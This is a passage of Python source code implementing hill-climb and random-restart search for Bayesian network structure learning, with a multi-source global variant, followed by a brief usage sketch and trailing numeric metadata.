operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
# score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_delta = self.get_local_score(Y, new_parents) - self.get_local_score(Y, old_parents)
yield (operation, score_delta)
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
# score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_delta = self.get_local_score(Y, new_parents) - self.get_local_score(Y, old_parents)
yield (operation, score_delta)
for (X, Y) in model.edges(): # (3) flip single edge
if (Y, X) not in prohibited_inbound_edges and (Y, X) not in prohibited_outbound_edges:
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)):
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
# score_delta = (local_score(X, new_X_parents) +
# local_score(Y, new_Y_parents) -
# local_score(X, old_X_parents) -
# local_score(Y, old_Y_parents))
score_delta = (self.get_local_score(X, new_X_parents) +
self.get_local_score(Y, new_Y_parents) -
self.get_local_score(X, old_X_parents) -
self.get_local_score(Y, old_Y_parents))
yield (operation, score_delta)
def _legal_operations_without_score(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
nodes = self.state_names.keys()
# inbound nodes: their outbound edges are prohibited
prohibited_outbound_edges = set()
for node in self.inbound_nodes:
prohibited_outbound_edges.update([(node, X) for X in nodes])
# outbound nodes: their inbound edges are prohibited
prohibited_inbound_edges = set()
for node in self.outbound_nodes:
prohibited_inbound_edges.update([(X, node) for X in nodes])
potential_new_edges = (set(permutations(nodes, 2)) -
set(model.edges()) -
set([(Y, X) for (X, Y) in model.edges()]) -
set(self.known_independencies) -
prohibited_outbound_edges -
prohibited_inbound_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
yield operation
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
yield operation
for (X, Y) in model.edges(): # (3) flip single edge
if (Y, X) not in prohibited_inbound_edges and (Y, X) not in prohibited_outbound_edges:
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)):
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
yield operation
def estimate(self, start=None, tabu_list=[], tabu_length=0, max_indegree=None):
"""
Performs local hill climb search to estimate the `BayesianModel` structure
that has optimal score, according to the scoring method supplied in the constructor.
Starts at model `start` and proceeds by step-by-step network modifications
until a local maximum is reached. Only estimates network structure, no parametrization.
Parameters
----------
start: BayesianModel instance
The starting point for the local search. By default a completely disconnected network is used.
tabu_list: list[operations]
tabu_length: int
If provided, the last `tabu_length` graph modifications cannot be reversed
during the search procedure. This serves to enforce a wider exploration
of the search space. Default value: 0 (no tabu list).
max_indegree: int or None
If provided and not None, the procedure only searches among models
where all nodes have at most `max_indegree` parents. Defaults to None.
Returns
-------
model: `BayesianModel` instance
A `BayesianModel` at a (local) score maximum.
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from pgmpy.estimators import HillClimbSearch, BicScore
>>> # create data sample with 9 random variables:
... data = pd.DataFrame(np.random.randint(0, 5, size=(5000, 9)), columns=list('ABCDEFGHI'))
>>> # add 10th dependent variable
... data['J'] = data['A'] * data['B']
>>> est = HillClimbSearch(data, scoring_method=BicScore(data))
>>> best_model = est.estimate()
>>> sorted(best_model.nodes())
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']
>>> best_model.edges()
[('B', 'J'), ('A', 'J')]
>>> # search a model with restriction on the number of parents:
>>> est.estimate(max_indegree=1).edges()
[('J', 'A'), ('B', 'J')]
"""
epsilon = 1e-8
nodes = self.state_names.keys()
if start is None:
start = BayesianModel()
start.add_nodes_from(nodes)
elif not isinstance(start, BayesianModel) or not set(start.nodes()) == set(nodes):
raise ValueError("'start' should be a BayesianModel with the same variables as the data set, or 'None'.")
current_model = start
while True:
best_score_delta = 0
best_operation = None
for operation, score_delta in self._legal_operations(current_model, tabu_list, max_indegree):
if score_delta > best_score_delta:
best_operation = operation
best_score_delta = score_delta
print(best_operation)
print(best_score_delta)
if best_operation is None or best_score_delta < epsilon:
break
elif best_operation[0] == '+':
current_model.add_edge(*best_operation[1])
tabu_list = ([('-', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == '-':
current_model.remove_edge(*best_operation[1])
tabu_list = ([('+', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == 'flip':
X, Y = best_operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([best_operation] + tabu_list)[:tabu_length]
if len(self.lr_variables) > 0:
self.lr_learnable.append(self.is_lr_learnable(current_model))
return current_model
def random_restart(self, start=None, tabu_length=0, max_indegree=None):
# starting best model
if not start:
best_model = self.estimate(tabu_length=tabu_length, max_indegree=max_indegree)
else:
best_model = start
best_score = K2Score(self.data).score(best_model)
# iterate random restarts
for i in range(self.n_random_restarts):
current_model = best_model.copy()
n_moves = self.calculate_random_restart_length(i)
tabu_list = []
# perform random actions
for j in range(n_moves):
operations = []
for operation in self._legal_operations_without_score(current_model, tabu_list, max_indegree):
operations.append(operation)
try:
operation = random.choice(operations)
except IndexError:
continue
# perform operation
if operation[0] == '+':
current_model.add_edge(*operation[1])
tabu_list = ([('-', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == '-':
current_model.remove_edge(*operation[1])
tabu_list = ([('+', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == 'flip':
X, Y = operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([operation] + tabu_list)[:tabu_length]
# hill climb
print('----- hill climbing -----')
current_model = self.estimate(start=current_model, tabu_list=tabu_list,
tabu_length=tabu_length, max_indegree=max_indegree)
current_score = K2Score(self.data).score(current_model)
# compare with the best model
if current_score > best_score:
best_model = current_model
best_score = current_score
if len(self.lr_variables) > 0:
self.lr_learnable.append(self.is_lr_learnable(current_model))
return best_model.copy()
def calculate_random_restart_length(self, i):
return int(self.random_restart_length + i)
def get_local_score(self, node, parents):
local_score = self.scoring_method.local_score
key = tuple([node, tuple(sorted(parents))])
# get score from cache
if key in self.scores[self.index].keys():
return self.scores[self.index][key]
# cache result for later use
else:
score = local_score(node, parents)
self.scores[self.index][key] = score
return score
def is_lr_learnable(self, model):
variable2lr = defaultdict(set)
for i, lr in enumerate(self.lr_variables):
for variable in lr:
variable2lr[variable].add(i)
# cross local-relation edges
for start, end in model.edges:
if variable2lr[start] & variable2lr[end] == set():
return False
# inbound edges from multiple tables
inbound = defaultdict(set)
for start, end in model.edges:
inbound[end] |= (variable2lr[start] & variable2lr[end])
if len(inbound[end]) > 1:
return False
return True
class GlobalHillClimbSearch(object):
def __init__(self, parser, n_random_restarts=10, random_restart_length=5):
"""
Class for heuristic hill climb searches for BayesianModels, to learn
network structure from data. `estimate` attempts to find a model with optimal score.
Parameters
----------
parser: MultipleFileParser
"""
self.parser = parser
self.scoring_methods = []
for single_parser in self.parser.single_file_parsers:
self.scoring_methods.append(K2Score(single_parser.data_frame))
# variable -> data source mapping
self.variable_source_mapping = {}
for i in range(len(self.parser.single_file_parsers)):
parser = self.parser.single_file_parsers[i]
for var in parser.variables:
if var not in self.variable_source_mapping.keys():
self.variable_source_mapping[var] = {i}
else:
self.variable_source_mapping[var].add(i)
# random restart parameters
self.n_random_restarts = n_random_restarts
self.random_restart_length = random_restart_length
# record training KL curve
self.structure_history = []
def _legal_operations(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
prohibited_edges = self.outbound_constraints(model)
potential_new_edges = set()
edge_map = {}
for i in range(len(self.parser.single_file_parsers)):
local_nodes = self.parser.single_file_parsers[i].variables
potential_new_local_edges = (set(permutations(local_nodes, 2)) -
set([(X, Y) for (X, Y) in model.edges()]) -
set([(Y, X) for (X, Y) in model.edges()]) -
prohibited_edges)
# store which data source the edge resides in
for edge in potential_new_local_edges:
if edge in edge_map.keys():
edge_map[edge].append(i)
else:
edge_map[edge] = [i]
potential_new_edges.update(potential_new_local_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
score_deltas = []
for index in edge_map[(X, Y)]:
nodes = set(old_parents + new_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
local_score = self.scoring_methods[index].local_score
score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_deltas.append(score_delta)
if len(score_deltas) > 0:
yield (operation, sum(score_deltas) / len(score_deltas))
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
score_deltas = []
for index in self.data_source(X, Y):
nodes = set(old_parents + new_parents + [X, Y])
if len(list(
filter(lambda x: x not in self.parser.single_file_parsers[index].variables, nodes))) > 0:
continue
local_score = self.scoring_methods[index].local_score
score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_deltas.append(score_delta)
if len(score_deltas) > 0:
yield (operation, sum(score_deltas) / len(score_deltas))
for (X, Y) in model.edges(): # (3) flip single edge
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)) and (Y, X) not in prohibited_edges:
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
score_deltas = []
for index in self.data_source(X, Y):
nodes = set(old_X_parents + new_X_parents + old_Y_parents + new_Y_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
local_score = self.scoring_methods[index].local_score
score_delta = (local_score(X, new_X_parents) +
local_score(Y, new_Y_parents) -
local_score(X, old_X_parents) -
local_score(Y, old_Y_parents))
score_deltas.append(score_delta)
if len(score_deltas) > 0:
yield (operation, sum(score_deltas) / len(score_deltas))
def _legal_operations_without_score(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
prohibited_edges = self.outbound_constraints(model)
potential_new_edges = set()
edge_map = {}
for i in range(len(self.parser.single_file_parsers)):
local_nodes = self.parser.single_file_parsers[i].variables
potential_new_local_edges = (set(permutations(local_nodes, 2)) -
set([(X, Y) for (X, Y) in model.edges()]) -
set([(Y, X) for (X, Y) in model.edges()]) -
prohibited_edges)
# store which data source the edge resides in
for edge in potential_new_local_edges:
if edge in edge_map.keys():
edge_map[edge].append(i)
else:
edge_map[edge] = [i]
potential_new_edges.update(potential_new_local_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
valid_count = 0
for index in edge_map[(X, Y)]:
nodes = set(old_parents + new_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
valid_count += 1
if valid_count > 0:
yield operation
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
valid_count = 0
for index in self.data_source(X, Y):
nodes = set(old_parents + new_parents + [X, Y])
if len(list(
filter(lambda x: x not in self.parser.single_file_parsers[index].variables, nodes))) > 0:
continue
valid_count += 1
if valid_count > 0:
yield operation
for (X, Y) in model.edges(): # (3) flip single edge
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)):
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list and (Y, X) not in prohibited_edges:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
valid_count = 0
for index in self.data_source(X, Y):
nodes = set(old_X_parents + new_X_parents + old_Y_parents + new_Y_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
valid_count += 1
if valid_count > 0:
yield operation
def outbound_constraints(self, model):
prohibited_edges = set()
for (X, Y) in list(model.edges):
if Y in self.parser.shared_variables:
constrained_sources = self.variable_source_mapping[Y] - self.data_source(X, Y)
for i in constrained_sources:
for var in self.parser.single_file_parsers[i].variables:
prohibited_edges.add((var, Y))
return prohibited_edges
def data_source(self, X, Y):
"""
Finds the common data source between X and Y
:param X:
:param Y:
:return: the set of common source indices
"""
return self.variable_source_mapping[X].intersection(self.variable_source_mapping[Y])
def estimate(self, start=None, tabu_list=[], tabu_length=0, max_indegree=None):
"""
Performs local hill climb search to estimate the `BayesianModel` structure
that has optimal score, according to the scoring method supplied in the constructor.
Starts at model `start` and proceeds by step-by-step network modifications
until a local maximum is reached. Only estimates network structure, no parametrization.
Parameters
----------
start: BayesianModel instance
The starting point for the local search. By default a completely disconnected network is used.
tabu_list: list
tabu_length: int
If provided, the last `tabu_length` graph modifications cannot be reversed
during the search procedure. This serves to enforce a wider exploration
of the search space. Default value: 0 (no tabu list).
max_indegree: int or None
If provided and not None, the procedure only searches among models
where all nodes have at most `max_indegree` parents. Defaults to None.
Returns
-------
model: `BayesianModel` instance
A `BayesianModel` at a (local) score maximum.
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from pgmpy.estimators import HillClimbSearch, BicScore
>>> # create data sample with 9 random variables:
... data = pd.DataFrame(np.random.randint(0, 5, size=(5000, 9)), columns=list('ABCDEFGHI'))
>>> # add 10th dependent variable
... data['J'] = data['A'] * data['B']
>>> est = HillClimbSearch(data, scoring_method=BicScore(data))
>>> best_model = est.estimate()
>>> sorted(best_model.nodes())
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']
>>> best_model.edges()
[('B', 'J'), ('A', 'J')]
>>> # search a model with restriction on the number of parents:
>>> est.estimate(max_indegree=1).edges()
[('J', 'A'), ('B', 'J')]
"""
epsilon = 1e-8
nodes = self.parser.relevant_variables
if start is None:
start = BayesianModel()
start.add_nodes_from(nodes)
elif not isinstance(start, BayesianModel) or not set(start.nodes()) == set(nodes):
raise ValueError("'start' should be a BayesianModel with the same variables as the data set, or 'None'.")
current_model = start
while True:
best_score_delta = 0
best_operation = None
for operation, score_delta in self._legal_operations(current_model, tabu_list, max_indegree):
if score_delta > best_score_delta:
best_operation = operation
best_score_delta = score_delta
print(best_operation)
print(best_score_delta)
if best_operation is None or best_score_delta < epsilon:
break
elif best_operation[0] == '+':
current_model.add_edge(*best_operation[1])
tabu_list = ([('-', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == '-':
current_model.remove_edge(*best_operation[1])
tabu_list = ([('+', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == 'flip':
X, Y = best_operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([best_operation] + tabu_list)[:tabu_length]
self.structure_history.append(current_model.edges)
return current_model
def global_score(self, model):
score = 0
for node in model.nodes():
scores = []
for index in self.variable_source_mapping[node]:
nodes = list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
set([node] + list(model.predecessors(node)))))
if len(nodes) > 0:
continue
scores.append(self.scoring_methods[index].local_score(node, list(model.predecessors(node))))
score += sum(scores) / len(scores)
return score
def random_restart(self, start=None, tabu_length=0, max_indegree=None):
# starting best model
if not start:
best_model = self.estimate(tabu_length=tabu_length, max_indegree=max_indegree)
else:
best_model = start
best_score = self.global_score(best_model)
# iterate random restarts
for i in range(self.n_random_restarts):
current_model = best_model.copy()
n_moves = i + self.random_restart_length
tabu_list = []
# perform random actions
for j in range(n_moves):
operations = []
for operation in self._legal_operations_without_score(current_model, tabu_list, max_indegree):
operations.append(operation)
try:
operation = random.choice(operations)
except IndexError:
continue
# perform operation
if operation[0] == '+':
current_model.add_edge(*operation[1])
tabu_list = ([('-', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == '-':
current_model.remove_edge(*operation[1])
tabu_list = ([('+', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == 'flip':
X, Y = operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([operation] + tabu_list)[:tabu_length]
# hill climbing
print('----- hill climbing -----')
current_model = self.estimate(start=current_model, tabu_list=tabu_list,
tabu_length=tabu_length, max_indegree=max_indegree)
current_score = self.global_score(current_model)
# compare with the best model
if current_score > best_score:
best_model = current_model
best_score = current_score
return best_model.copy()
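A hedged usage sketch for this estimator variant (the synthetic data, column names, and parameter choices are illustrative assumptions; scores=[{}] seeds the per-estimator cache that get_local_score indexes via self.scores[self.index]):
import numpy as np
import pandas as pd

# Toy discrete dataset; D is made dependent on A so the search has signal to find.
rng = np.random.RandomState(0)
data = pd.DataFrame(rng.randint(0, 3, size=(2000, 3)), columns=list("ABC"))
data["D"] = (data["A"] + rng.randint(0, 2, size=2000)) % 3

est = HillClimbSearch(data, scores=[{}], index=0, n_random_restarts=2)
best = est.random_restart(tabu_length=10, max_indegree=2)
print(sorted(best.edges()))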
| 48.401907
| 119
| 0.559743
| 4,134
| 35,527
| 4.601113
| 0.085389
| 0.006624
| 0.004626
| 0.013669
| 0.838915
| 0.819515
| 0.810315
| 0.798065
| 0.793859
| 0.793281
| 0
| 0.007512
| 0.347989
| 35,527
| 733
| 120
| 48.46794
| 0.813633
| 0.225716
| 0
| 0.806383
| 0
| 0
| 0.011073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034043
| false
| 0
| 0.014894
| 0.002128
| 0.080851
| 0.012766
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|